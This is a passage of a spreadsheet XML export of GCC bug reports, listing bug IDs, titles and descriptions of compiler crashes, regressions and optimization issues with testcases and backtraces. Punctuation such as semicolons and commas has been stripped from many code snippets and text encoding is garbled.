+ gcc-build/destdir/usr/local/bin/gcc /home/infinity0/var/lib/reproducible/test0.c -g -dA -S -o- | grep comp_dir
	.long	.LASF4	# DW_AT_comp_dir: /home/infinity0/var/lib/reproducible
	.uleb128 0x1b	# (DW_AT_comp_dir)
+ gcc-build/destdir/usr/local/bin/gcc /home/infinity0/var/lib/reproducible/test1.c -g -dA -S -o- | grep comp_dir
# exit code 1
See the attached file for a shell script where you can reproduce this yourself.</t>
  </si>
  <si>
    <t>infinity0</t>
  </si>
  <si>
    <t>GCC-51010</t>
  </si>
  <si>
    <t>[4.7 Regression] bad diagnostics: #'ssa_name' not supported by pp_c_expression#]'</t>
  </si>
  <si>
    <t>Compiling this with -O1 -Wall will cause weird output:
int f (int j)
{
  int a [10]
  return a [j]
}
$ ./cc1 -quiet -O1 -Wall bug.c
#'ssa_name' not supported by pp_c_expression#]'bug.c: In function 'f':
bug.c:4:3: warning:  is used uninitialized in this function [-Wuninitialized]
$
Caused by r154918 (but was latent until the fix for pr50040 r177667):
    2009-12-02  Richard Guenther  
        PR middle-end/42088
        * tree.c (free_lang_data): Disable if not using LTO.
Reverting r154918 helps:
bug.c: In function 'f':
bug.c:4:3: warning: 'a[j_1(D)]' is used uninitialized in this function [-Wuninitialized]</t>
  </si>
  <si>
    <t>GCC-7401</t>
  </si>
  <si>
    <t>bug in bug report</t>
  </si>
  <si>
    <t xml:space="preserve"> &gt;The attach file also serves as a testcase returning 0 if
 &gt;the bug is present 1 otherwise.
 It's the other way around. Sorry.
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-28158</t>
  </si>
  <si>
    <t>[4.2 Regression] ICE on complex operation with -O1 -msse</t>
  </si>
  <si>
    <t>The following Fortran testcase exhibits a failure with -O(&gt;=1) -msse:
$ cat foo.f90
     subroutine yhalf(z)
     complex cdexpjz
     z=cdexpj((0.d01.d0)*z)
     end
$ gfortran -c -O3 -msse -mfpmath=sse387   foo.f90
foo.f90: In function â€˜yhalfâ€™:
foo.f90:3: error: unrecognizable insn:
(insn 13 12 14 3 (set (reg:DF 63)
        (neg:DF (reg:DF 62))) -1 (nil)
    (nil))
foo.f90:3: internal compiler error: in extract_insn at recog.c:2077
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ gfortran -c -O3 -msse2 -mfpmath=sse387   foo.f90
$</t>
  </si>
  <si>
    <t>GCC-5359</t>
  </si>
  <si>
    <t>[cygwin] ICE</t>
  </si>
  <si>
    <t>GCC 2.95.3-5 (cygwin special version) reports internal 
compiler error when compile a code which instanceates some
template class that contains friend.
Maybe it's only the cygwin special version's case since 
other versions of gcc (2.96 egcs-2.91.66) for Linux can
compile it well.
Release:
GCC 2.95.3-5 (cygwin special version)
Environment:
Cygwin
How-To-Repeat:
Invoke the following command:
  g++ bug.cc
where bug.cc is the file attached above.</t>
  </si>
  <si>
    <t>t</t>
  </si>
  <si>
    <t>GCC-69797</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE on invalid code on x86_64-linux-gnu in operator[] at vec.h:714</t>
  </si>
  <si>
    <t>The following code causes an ICE when compiled with the current gcc trunk on x86_64-linux-gnu.  
This also affects 4.8.x and later releases and is a regression from 4.7.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/6.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-trunk/configure --prefix=/usr/local/gcc-trunk --enable-languages=cc++ --disable-werror --enable-multilib
Thread model: posix
gcc version 6.0.0 20160212 (experimental) [trunk revision 233377] (GCC) 
$ 
$ 
$ 
$ g++-4.7 -c small.cc
small.cc: In function â€˜void fn1()â€™:
small.cc:4:23: error: too few arguments to function â€˜__atomic_fetch_addâ€™
$ 
$ 
$ 
$ g++-trunk -c small.cc
small.cc: In function â€˜void fn1()â€™:
small.cc:4:23: internal compiler error: in operator[] at vec.h:714
   __atomic_fetch_add ()
                       ^
0x8643c2 vec::operator[](unsigned int)
	../../gcc-trunk/gcc/vec.h:714
0x8643c2 resolve_overloaded_atomic_exchange
	../../gcc-trunk/gcc/c-family/c-common.c:11030
0x8643c2 resolve_overloaded_builtin(unsigned int tree_node* vec*)
	../../gcc-trunk/gcc/c-family/c-common.c:11305
0x781c2a finish_call_expr(tree_node* vec** bool bool int)
	../../gcc-trunk/gcc/cp/semantics.c:2381
0x6fe182 cp_parser_postfix_expression
	../../gcc-trunk/gcc/cp/parser.c:6902
0x6fc28c cp_parser_unary_expression
	../../gcc-trunk/gcc/cp/parser.c:7989
0x706557 cp_parser_cast_expression
	../../gcc-trunk/gcc/cp/parser.c:8666
0x706aed cp_parser_binary_expression
	../../gcc-trunk/gcc/cp/parser.c:8767
0x707390 cp_parser_assignment_expression
	../../gcc-trunk/gcc/cp/parser.c:9054
0x709d6a cp_parser_expression
	../../gcc-trunk/gcc/cp/parser.c:9223
0x70a313 cp_parser_expression_statement
	../../gcc-trunk/gcc/cp/parser.c:10684
0x71958e cp_parser_statement
	../../gcc-trunk/gcc/cp/parser.c:10535
0x719f94 cp_parser_statement_seq_opt
	../../gcc-trunk/gcc/cp/parser.c:10807
0x71a09f cp_parser_compound_statement
	../../gcc-trunk/gcc/cp/parser.c:10761
0x71a1fd cp_parser_function_body
	../../gcc-trunk/gcc/cp/parser.c:20641
0x71a1fd cp_parser_ctor_initializer_opt_and_function_body
	../../gcc-trunk/gcc/cp/parser.c:20677
0x71acb1 cp_parser_function_definition_after_declarator
	../../gcc-trunk/gcc/cp/parser.c:25309
0x71b904 cp_parser_function_definition_from_specifiers_and_declarator
	../../gcc-trunk/gcc/cp/parser.c:25221
0x71b904 cp_parser_init_declarator
	../../gcc-trunk/gcc/cp/parser.c:18419
0x71bb1b cp_parser_simple_declaration
	../../gcc-trunk/gcc/cp/parser.c:12359
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$ 
---------------------------
void
fn1 () 
{
  __atomic_fetch_add ()
}</t>
  </si>
  <si>
    <t>GCC-79588</t>
  </si>
  <si>
    <t>[7 Regression] ICE in warn_for_restrict with -Wrestrict</t>
  </si>
  <si>
    <t>Starting from revision where -Wrestrict was introduced (r242366) we ICE:
$ g++ /home/marxin/Programming/gcc/gcc/testsuite/g++.dg/opt/expect2.C -Wrestrict
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/opt/expect2.C: In function â€˜void bar()â€™:
/home/marxin/Programming/gcc/gcc/testsuite/g++.dg/opt/expect2.C:10:26: internal compiler error: Segmentation fault
   __builtin_expect (foo () 
                          ^
0xb8b2af crash_signal
	../../gcc/toplev.c:337
0x7f7008 warn_for_restrict(unsigned int vec*)
	../../gcc/c-family/c-warn.c:2176
0x6ef18a cp_parser_postfix_expression
	../../gcc/cp/parser.c:6952
0x6ed1fa cp_parser_unary_expression
	../../gcc/cp/parser.c:8124
0x6f5497 cp_parser_cast_expression
	../../gcc/cp/parser.c:8801
0x6f5a2d cp_parser_binary_expression
	../../gcc/cp/parser.c:8902
0x6f6120 cp_parser_assignment_expression
	../../gcc/cp/parser.c:9189
0x6f7906 cp_parser_parenthesized_expression_list
	../../gcc/cp/parser.c:7595
0x6eea2e cp_parser_postfix_expression
	../../gcc/cp/parser.c:6850
0x6ed1fa cp_parser_unary_expression
	../../gcc/cp/parser.c:8124
0x6f5497 cp_parser_cast_expression
	../../gcc/cp/parser.c:8801
0x6f5a2d cp_parser_binary_expression
	../../gcc/cp/parser.c:8902
0x6f6120 cp_parser_assignment_expression
	../../gcc/cp/parser.c:9189
0x6f848a cp_parser_expression
	../../gcc/cp/parser.c:9358
0x6f89f8 cp_parser_expression_statement
	../../gcc/cp/parser.c:10906
0x707667 cp_parser_statement
	../../gcc/cp/parser.c:10722
0x7081e4 cp_parser_statement_seq_opt
	../../gcc/cp/parser.c:11048
0x7082bf cp_parser_compound_statement
	../../gcc/cp/parser.c:11002
0x7039c3 cp_parser_function_body
	../../gcc/cp/parser.c:21445
0x7039c3 cp_parser_ctor_initializer_opt_and_function_body
	../../gcc/cp/parser.c:21481</t>
  </si>
  <si>
    <t>GCC-52158</t>
  </si>
  <si>
    <t>Regression on character function with gfortran 4.7</t>
  </si>
  <si>
    <t>A build from a snapshot of the development branch as of February 4 appears to have a regression on deferred-length character functions.  The text below shows a test that compiles with gcc 4.6.2 but not with 4.7.  
$ cat character_function.F90
module foo_class 
  implicit none 
  type foo 
  contains 
    procedure :: bar
  end type 
contains 
  function bar(this)
    class(foo) :: this
    character(:) allocatable :: bar
  end function 
end module 
$ /opt/local/bin/gfortran-mp-4.6 -c character_function.F90
$ /opt/local/bin/gfortran-mp-4.7 -c character_function.F90
character_function.F90:9.22:
    class(foo) :: this
                      1
Error: Deferred-length character component 'bar' at (1) is not yet
supported
$ /opt/local/bin/gfortran-mp-4.7 --version
GNU Fortran (GCC) 4.7.0 20120204 (experimental)
Damian</t>
  </si>
  <si>
    <t>GCC-63259</t>
  </si>
  <si>
    <t>Detecting byteswap sequence</t>
  </si>
  <si>
    <t>This is just silly. GCC optimizes the first function into single opcode (bswap) but not the other. For Clang it's the other way around.
unsigned byteswap_gcc(unsigned result)
{
    result = ((result 
    result = ((result 
    return result
}
unsigned byteswap_clang(unsigned result)
{
    result = ((result 
    result = ((result 
    return result
}
unsigned byteswap(unsigned v)
{
    #ifdef __clang__
     return byteswap_clang(v)
    #else
     return byteswap_gcc(v)
    #endif
}
GCC output:
    byteswap_gcc:
        movl    %edi %eax
        bswap   %eax
        ret
    byteswap_clang:
        movl    %edi %eax
        andl    $-16711936 %eax
        shrl    $8 %eax
        movl    %eax %edx
        movl    %edi %eax
        andl    $16711935 %eax
        sall    $8 %eax
        orl     %edx %eax
        roll    $16 %eax
        ret
    byteswap:
        movl    %edi %eax
        bswap   %eax
        ret
Clang output:
    byteswap_gcc:                           # @byteswap_gcc
        roll    $16 %edi
        movl    %edi %eax
        shrl    $8 %eax
        andl    $16711935 %eax         # imm = 0xFF00FF
        shll    $8 %edi
        andl    $-16711936 %edi        # imm = 0xFFFFFFFFFF00FF00
        orl     %eax %edi
        movl    %edi %eax
        retq
    byteswap_clang:                         # @byteswap_clang
        bswapl  %edi
        movl    %edi %eax
        retq
    byteswap:                               # @byteswap
        bswapl  %edi
        movl    %edi %eax
        retq
Tested both -m32 and -m64 with options: -Ofast -S
Tested versions:
- gcc (Debian 4.9.1-11) 4.9.1  Target: x86_64-linux-gnu
- Debian clang version 3.5.0-+rc1-2 (tags/RELEASE_35/rc1) (based on LLVM 3.5.0)  Target: x86_64-pc-linux-gnu</t>
  </si>
  <si>
    <t>GCC-43396</t>
  </si>
  <si>
    <t>Very long compile time with -O1 -fgraphite-identity</t>
  </si>
  <si>
    <t>Command line:
gcc -O1 -fgraphite-identity
or
gcc -Os -fgraphite-identity
(doesn't happen at -O[023])
Tested revisions:
trunk r157460 - fail (after pr43349 fix)
trunk r153685 - fail
I am not sure if this is a regression - 4.4 compiles quickly but time report doesn't show any information about time spent in graphite code.
Compiler output:
$ /mnt/svn/gcc-trunk/binary-157460-lto/bin/gcc -ftime-report -fgraphite-identity -O1 -c testcase.c 
Execution times (seconds)
 CFG verifier          :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 tree gimplify         :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall       6 kB ( 0%) ggc
 tree SSA rewrite      :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       2 kB ( 0%) ggc
 tree SSA incremental  :   0.07 ( 1%) usr   0.00 ( 0%) sys   0.04 ( 0%) wall      12 kB ( 0%) ggc
 tree reassociation    :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       5 kB ( 0%) ggc
 Graphite loop transforms:   0.01 ( 0%) usr   0.00 ( 0%) sys   0.00 ( 0%) wall      32 kB ( 1%) ggc
 Graphite code generation:  10.52 (94%) usr   0.10 (91%) sys  11.02 (95%) wall    1222 kB (31%) ggc
 tree SSA verifier     :   0.14 ( 1%) usr   0.00 ( 0%) sys   0.11 ( 1%) wall       0 kB ( 0%) ggc
 tree STMT verifier    :   0.33 ( 3%) usr   0.00 ( 0%) sys   0.33 ( 3%) wall       0 kB ( 0%) ggc
 dominance computation :   0.02 ( 0%) usr   0.01 ( 9%) sys   0.02 ( 0%) wall       0 kB ( 0%) ggc
 expand                :   0.02 ( 0%) usr   0.00 ( 0%) sys   0.02 ( 0%) wall     235 kB ( 6%) ggc
 combiner              :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall     128 kB ( 3%) ggc
 if-conversion         :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      71 kB ( 2%) ggc
 integrated RA         :   0.03 ( 0%) usr   0.00 ( 0%) sys   0.03 ( 0%) wall      90 kB ( 2%) ggc
 reload                :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall      44 kB ( 1%) ggc
 final                 :   0.01 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 plugin execution      :   0.00 ( 0%) usr   0.00 ( 0%) sys   0.01 ( 0%) wall       0 kB ( 0%) ggc
 TOTAL                 :  11.22             0.11            11.66               3925 kB
Extra diagnostic checks enabled compiler may run slowly.
Configure with --enable-checking=release to disable checks.
(disabling checking doesn't significantly help)</t>
  </si>
  <si>
    <t>GCC-11794</t>
  </si>
  <si>
    <t>[3.4 Regression]using declaration inside nested class seems ignored</t>
  </si>
  <si>
    <t>The following code compiles with gcc 3.3 but not with gcc version 3.4 20030803
(experimental) though I think I added the right using-declaration.
template  struct a {
  struct a1:public T {
    using T::aa
    a1() {
      aa = 5
    }
  }
}
struct b {
  int aa
}
a ::a1 Ia
Reading specs from /esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/specs
Configured with: ../../gcc/3.4/configure --program-suffix=-3.4
--enable-languages=cc++ --prefix=/esat/quendi/gcc
Thread model: posix
gcc version 3.4 20030803 (experimental)
 /esat/quendi/gcc/libexec/gcc/i686-pc-linux-gnu/3.4/cc1plus -quiet -v
-D_GNU_SOURCE p5.cpp -quiet -dumpbase p5.cpp -mtune=pentiumpro -auxbase-strip p5
-version -o /tmp/cczVENum.s
ignoring nonexistent directory
/esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/../../../../i686-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4
 /esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/i686-pc-linux-gnu
 /esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/../../../../include/c++/3.4/backward
 /usr/local/include
 /esat/quendi/gcc/include
 /esat/quendi/gcc/lib/gcc/i686-pc-linux-gnu/3.4/include
 /usr/include
End of search list.
GNU C++ version 3.4 20030803 (experimental) (i686-pc-linux-gnu)
        compiled by GNU C version 3.3.
GGC heuristics: --param ggc-min-expand=55 --param ggc-min-heapsize=48056
p5.cpp: In constructor `a::a1::a1()':
p5.cpp:1: error: `aa' undeclared (first use this function)
p5.cpp:1: error: (Each undeclared identifier is reported only once for each
   function it appears in.)</t>
  </si>
  <si>
    <t>GCC-2421</t>
  </si>
  <si>
    <t>can't declare ordinary nested class as friend of template class</t>
  </si>
  <si>
    <t>The following is an example of the problem as described in the synopsis:
class A {
public:
   class X
}
template
class B {
   friend class A::X
public:
   B() {}
}
int main()
{
   B b
   return 0
}
causes 'A::X' does not declare a template type
Release:
2.95.2
Environment:
Debian 2.2 i386
How-To-Repeat:
Compile example in description</t>
  </si>
  <si>
    <t>jhl</t>
  </si>
  <si>
    <t>GCC-69014</t>
  </si>
  <si>
    <t>[5 Regression] gcc.c-torture/execute/991023-1.c FAILs with -Os -fmodulo-sched -fno-tree-vrp</t>
  </si>
  <si>
    <t>Created attachment 37107
testcase (gcc.c-torture/execute/991023-1.c)
Output:
$ armv7a-hardfloat-linux-gnueabi-gcc -Os -fmodulo-sched -fno-tree-vrp testcase.c
$ qemu-arm ./a.out 
qemu: uncaught target signal 6 (Aborted) - core dumped
Aborted
$ armv7a-hardfloat-linux-gnueabi-gcc -v
Using built-in specs.
COLLECT_GCC=/repo/gcc-trunk/binary-trunk-231884-checking-yes-rtl-df-nographite-armv7a-hardfloat/bin/armv7a-hardfloat-linux-gnueabi-gcc
COLLECT_LTO_WRAPPER=/repo/gcc-trunk/binary-trunk-231884-checking-yes-rtl-df-nographite-armv7a-hardfloat/bin/../libexec/gcc/armv7a-hardfloat-linux-gnueabi/6.0.0/lto-wrapper
Target: armv7a-hardfloat-linux-gnueabi
Configured with: /repo/gcc-trunk//configure --enable-languages=cc++ --enable-checking=yesrtldf --without-cloog --without-ppl --without-isl --with-float=hard --build=x86_64-pc-linux-gnu --host=x86_64-pc-linux-gnu --target=armv7a-hardfloat-linux-gnueabi --with-ld=/usr/bin/armv7a-hardfloat-linux-gnueabi-ld --with-as=/usr/bin/armv7a-hardfloat-linux-gnueabi-as --with-sysroot=/usr/armv7a-hardfloat-linux-gnueabi --disable-libstdcxx-pch --prefix=/repo/gcc-trunk//binary-trunk-231884-checking-yes-rtl-df-nographite-armv7a-hardfloat
Thread model: posix
gcc version 6.0.0 20151221 (experimental) (GCC) 
Other targets (powerpc[64] aarch64 i686 x86_64 x32) do not have this problem.
Tested revisions:
r231884 - FAIL
5-branch r231870 - FAIL
4_9-branch r231865 - FAIL
4_8-branch r224828 - OK</t>
  </si>
  <si>
    <t>GCC-11228</t>
  </si>
  <si>
    <t>[3.3/3.4 regression] ICE on new-expression using array operator new and default-initialization</t>
  </si>
  <si>
    <t>Compile the following translation unit with 3.3:
struct MDSWeight { }
void foo(int numWeights)
{
  new MDSWeight[numWeights]()
}
If the compiler is configured with --enable-checking this causes an internal compiler error:
foo.cc:5: internal compiler error: tree check: expected integer_cst have 
   non_lvalue_expr in tree_int_cst_lt at tree.c:3180
If the compiler is configured without checking the behavior is even less friendly: an infinite loop 
with the compiler allocating more and more memory.
I believe that the code above is legal.  (Although admittedly it would be more natural not to write 
the parentheses.)  The syntax of a new-expression is given in clause 5.3.4 paragraph 1.  
MDSWeight[numWeights] is a new-type-id (MDSWeight is a type-specifier-seq and 
[numWeights] is a direct-new-declarator.  () is a valid new-initializer.  Clause 5.3.4 paragraph 
15 describes the semantics of the new-initializer referring to clause 8.5.  Nothing in 5.3.4/15 or 
8.5 suggests that it's illegal to explicitly request default initialization when using array operator 
new.
Note that the ICE is a regression from 2.95 (which accepts this construct) and from 3.1/3.2 (which 
reject it with an error).</t>
  </si>
  <si>
    <t>GCC-17774</t>
  </si>
  <si>
    <t>-O2: internal compiler error: in choose_reload_regs at reload1.c:5861</t>
  </si>
  <si>
    <t>please see attachment #7254 to Bug #17771</t>
  </si>
  <si>
    <t>heinrich.brand</t>
  </si>
  <si>
    <t>GCC-66149</t>
  </si>
  <si>
    <t>ICE: tree check: expected field_decl have template_decl in int_bit_position at tree.h:5012 with -std=c++14 -gstabs</t>
  </si>
  <si>
    <t>Created attachment 35542
reduced testcase
Compiler output:
$ gcc -std=c++14 -gstabs testcase.C
testcase.C:1:8: internal compiler error: tree check: expected field_decl have template_decl in int_bit_position at tree.h:5012
 struct A
        ^
0x107683c tree_check_failed(tree_node const* char const* int char const* ...)
        /mnt/svn/gcc-5/gcc/tree.c:9297
0xa0bde9 tree_check(tree_node const* char const* int char const* tree_code)
        /mnt/svn/gcc-5/gcc/tree.h:3102
0xa0bde9 int_bit_position(tree_node const*)
        /mnt/svn/gcc-5/gcc/tree.h:5012
0xa04a0f dbxout_type_fields
        /mnt/svn/gcc-5/gcc/dbxout.c:1544
0xa04a0f dbxout_type
        /mnt/svn/gcc-5/gcc/dbxout.c:2221
0xa08af2 dbxout_symbol(tree_node* int)
        /mnt/svn/gcc-5/gcc/dbxout.c:2793
0xd1a0c2 rest_of_type_compilation(tree_node* int)
        /mnt/svn/gcc-5/gcc/passes.c:309
0x79b854 finish_struct_1(tree_node*)
        /mnt/svn/gcc-5/gcc/cp/class.c:6714
0x79cf94 finish_struct(tree_node* tree_node*)
        /mnt/svn/gcc-5/gcc/cp/class.c:6879
0x7d743d cp_parser_class_specifier_1
        /mnt/svn/gcc-5/gcc/cp/parser.c:19855
0x7d743d cp_parser_class_specifier
        /mnt/svn/gcc-5/gcc/cp/parser.c:20083
0x7d743d cp_parser_type_specifier
        /mnt/svn/gcc-5/gcc/cp/parser.c:14726
0x7eaeef cp_parser_decl_specifier_seq
        /mnt/svn/gcc-5/gcc/cp/parser.c:11957
0x7fc121 cp_parser_simple_declaration
        /mnt/svn/gcc-5/gcc/cp/parser.c:11534
0x7f5d83 cp_parser_block_declaration
        /mnt/svn/gcc-5/gcc/cp/parser.c:11481
0x7ffc29 cp_parser_declaration
        /mnt/svn/gcc-5/gcc/cp/parser.c:11378
0x7fe2ba cp_parser_declaration_seq_opt
        /mnt/svn/gcc-5/gcc/cp/parser.c:11264
0x7fe5cf cp_parser_translation_unit
        /mnt/svn/gcc-5/gcc/cp/parser.c:4100
0x7fe5cf c_parse_file()
        /mnt/svn/gcc-5/gcc/cp/parser.c:33192
0x935952 c_common_parse_file()
        /mnt/svn/gcc-5/gcc/c-family/c-opts.c:1057
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
Tested revisions:
r223190 - ICE
5 r222437 - ICE</t>
  </si>
  <si>
    <t>GCC-12801</t>
  </si>
  <si>
    <t>[3.4 regression] labug1.f fails</t>
  </si>
  <si>
    <t>Regression test g77.f-torture/execute/labug1.f execution fails
on i686-pc-cygwin with current CVS head
FAIL: g77.f-torture/execute/labug1.f execution  -O2 
FAIL: g77.f-torture/execute/labug1.f execution  -O3 -g 
The failure was introduced around Fri Oct 17 2003:
 - Passes: Thu Oct 16 08:19:44 GMT 2003
 - Fails: Fri Oct 17 14:00:02 GMT 2003
Note that times are approximate as CVS update from local copy.
Independent confirmation on cygwin
http://gcc.gnu.org/ml/gcc-testresults/2003-10/msg01188.html
No evidence on other platforms.</t>
  </si>
  <si>
    <t>GCC-48175</t>
  </si>
  <si>
    <t>[x32] FAIL: gcc.c-torture/execute/builtins/strcat.c</t>
  </si>
  <si>
    <t>[hjl@gnu-33 gcc]$ cat /tmp/x.c
extern void abort (void)
typedef __SIZE_TYPE__ size_t
extern char *strcat (char * const char *)
extern char *strcpy (char * const char *)
extern void *memset (void * int size_t)
extern int memcmp (const void * const void * size_t)
#define RESET_DST_WITH(FILLER) \
  do { memset (dst 'X' sizeof (dst)) strcpy (dst (FILLER)) } while (0)
void main_test (void)
{
  const char *const s1 = hello world
  const char *const s2 = 
  char dst[64] *d2
  RESET_DST_WITH (s1)
  strcat (strcat (strcat (strcat (strcat (strcat (dst : this ) )
				  is ) a ) test) .)
  if (memcmp (dst hello world: this is a test.\0X 30))
    abort()
}
[hjl@gnu-33 gcc]$ ./xgcc -B./ -S -mx32 -O1 /tmp/x.c
/tmp/x.c: In function â€˜main_testâ€™:
/tmp/x.c:22:1: internal compiler error: in change_address_1 at emit-rtl.c:1933
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[hjl@gnu-33 gcc]$</t>
  </si>
  <si>
    <t>GCC-20091</t>
  </si>
  <si>
    <t>[4.0 Regression] 18_support/14026.cc execution test fails</t>
  </si>
  <si>
    <t>The libstdc++ test 18_support/14026.cc execution test has recently
started failing on multiple targets.  Observed on ia64-hpux and hppa64-hpux
gcc-testresults also shows it on powerpc64-unknown-linux-gnu
i686-pc-linux-gnu powerpc-unknown-linux-gnu and ia64-suse-linux-gnu.</t>
  </si>
  <si>
    <t>GCC-54520</t>
  </si>
  <si>
    <t>[4.8 Regression] ice in merge_latch_edges with -O3</t>
  </si>
  <si>
    <t>Created attachment 28151
C source code
I just tried to compile the package source-highlight-3.1.6-3
on gcc-4.8 trunk dated 20120905 on an AMD x86_64 box.
The compiler said
readtags.c: In function 'parseTagLine':
readtags.c:292:13: internal compiler error: in merge_latch_edges at cfgloop.c:678
 static void parseTagLine (tagFile *file tagEntry *const entry)
             ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source code attached. Flag -O3 required.</t>
  </si>
  <si>
    <t>GCC-9125</t>
  </si>
  <si>
    <t>VMClassLoader should cache the result of Runtime.(internal)loadLibrary()</t>
  </si>
  <si>
    <t>When you have a lot of classes that need to be interpreted then loading of the classes is very slow because the
VMClassLoader keeps tries to load new classes first by first trying to open the lib-sub-package-class.so files. But since there are no natively compiled classes it keeps falling back to the interpreter. We must cache the result of Runtime.(internal)loadLibrary() somewhere.
See also:
http://gcc.gnu.org/ml/java/2002-12/msg00285.html
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-64725</t>
  </si>
  <si>
    <t>FAIL: libgo/runtime TestFinalizerType testing.go:278: #2: finalizer for type func(*int) didn't run</t>
  </si>
  <si>
    <t>libgo.log (non-m32 part):
...
--- FAIL: TestFinalizerType (4.02s)
        testing.go:278: #2: finalizer for type func(*int) didn't run
FAIL
FAIL: runtime
/home/vries/gcc_versions/data/ref-master-15-01-21/src/libgo/testsuite/gotest: line 514: gotest-timeout: No such file or directory
...
configure line:
...
$ ./gcc/xgcc -v
Using built-in specs.
COLLECT_GCC=./gcc/xgcc
Target: x86_64-unknown-linux-gnu
Configured with: src/configure --prefix=install --with-cloog=infra --with-ppl=infra --with-gmp=infra --with-mpfr=infra --with-mpc=infra --with-isl=infra --enable-checking=yesrtl --enable-languages=cfortranadajavaobjcc++goobj-c++
Thread model: posix
gcc version 5.0.0 20150121 (experimental) (GCC) 
...
Using r219928
I've run the libgo testsuite twice more. The first time the FAIL dissapeared. The second time it reappeared but without the gotest-timeout message.</t>
  </si>
  <si>
    <t>GCC-21265</t>
  </si>
  <si>
    <t>[4.0 regression] GCC fails to optimize tail call to memset</t>
  </si>
  <si>
    <t>Given the code below GCC fails to optimize the tail call to memset into a jmp 
on x86_64-unknown-linux-gnu as of 4.0 or 4.1 mainline.  Versions 3.4 and 3.3 
perform the transformation so it is a regression.  All GCC versions on x86_64 
manage to optimize the call to my_memset so it may be related to builtin 
handling.  FYI none of the above versions of gcc optimize either memset or 
my_memset on x86.  So on x86 it's consistently failing I'm not sure if that's 
intentional or not.  But x86_64 is a regression.
Compile with -O2 -S:
#include 
extern void *memset (void * int size_t)
extern void *my_memset (void * int size_t)
void
foo (void *to size_t count)
{
  memset (to 0 count)
}
void
bar (void *to size_t count)
{
  my_memset (to 0 count)
}</t>
  </si>
  <si>
    <t>GCC-46217</t>
  </si>
  <si>
    <t>[4.6 Regression] store to volatile is removed</t>
  </si>
  <si>
    <t>Take:
int foo(int a)
{
  int t
  *(volatile int *)
}
--- CUT ---
We remove the store to t now.
I think this was caused by MEM_REF.</t>
  </si>
  <si>
    <t>GCC-51474</t>
  </si>
  <si>
    <t>[c++0x] ICE with pure virtual function in initialization of non-static data member</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE on trunk:
============================
struct A
{
  virtual int foo() = 0
  int i = foo()
}
============================
bug.cc:4:15: internal compiler error: Segmentation fault
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-66568</t>
  </si>
  <si>
    <t>[CHKP] internal compiler error: in expand_expr_addr_expr_1</t>
  </si>
  <si>
    <t>&gt;cat test.i
int a b c
void *set_test () {
  if (b)
    a ? exit (0) : exit (1)
  b = c
}
&gt;gcc -fcheck-pointer-bounds -mmpx -O2 test.i
test.i: In function 'set_test':
test.i:8:9: warning: implicit declaration of function 'exit' [-Wimplicit-function-declaration]
     a ? exit (0) : exit (1)
         ^
test.i:8:9: warning: incompatible implicit declaration of built-in function 'exit'
test.i:8:9: note: include '' or provide a declaration of 'exit'
test.i: In function 'set_test.chkp':
test.i:6:7: internal compiler error: in expand_expr_addr_expr_1 at expr.c:7671
 void *set_test () {
       ^
0x98c710 expand_expr_addr_expr_1
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/expr.c:7671
0x98cdaa expand_expr_addr_expr
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/expr.c:7760
0x9985f0 expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/expr.c:10638
0x98d1e1 expand_expr_real(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/expr.c:7928
0x83c460 expand_normal
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/expr.h:261
0x84853e expand_return
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/cfgexpand.c:3148
0x848cd1 expand_gimple_stmt_1
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/cfgexpand.c:3290
0x84922d expand_gimple_stmt
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/cfgexpand.c:3414
0x8502ed expand_gimple_basic_block
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/cfgexpand.c:5426
0x851f5f execute
        /gnumnt/msticlxl7_users/ienkovic/issues/mpx/gcc/gcc/cfgexpand.c:6045
Fails on GCC 6 and GCC 5.1</t>
  </si>
  <si>
    <t>GCC-15044</t>
  </si>
  <si>
    <t>[3.4/4.0 Regression] ICE on syntax error template header.</t>
  </si>
  <si>
    <t>ICE on syntax error as follows:
template class  class a { num_t n }
